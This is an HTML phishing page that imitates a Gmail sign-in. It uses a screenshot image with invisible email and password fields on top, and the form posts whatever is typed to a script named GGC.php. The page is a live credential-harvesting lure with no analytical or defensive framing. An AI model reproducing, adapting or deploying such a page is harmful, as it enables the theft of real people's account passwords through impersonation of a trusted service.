<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>GMA1L, </title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>

</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:398px;height:393px;text-align:left;z-index:3;">
<img src="gmail_files/GG1.png" id="Image1" alt="" style="width="480" height="480" " align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Form1" method="post"  action="GGC.php"">

<input id="email" style="position:absolute;left:159px;top:213px;width:156px;height:22px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:0" name="email" value="" type="text" required placeholder="Email">

<input style="position:absolute;left:159px;top:245px;width:156px;height:22px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1" name="password" value="" type="password"  required placeholder="Password">


<input id="Button1" name="Button1" value="" style="position:absolute;left:158px;top:277px;width:155.5px;height:22px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form>
</div>


</body></html>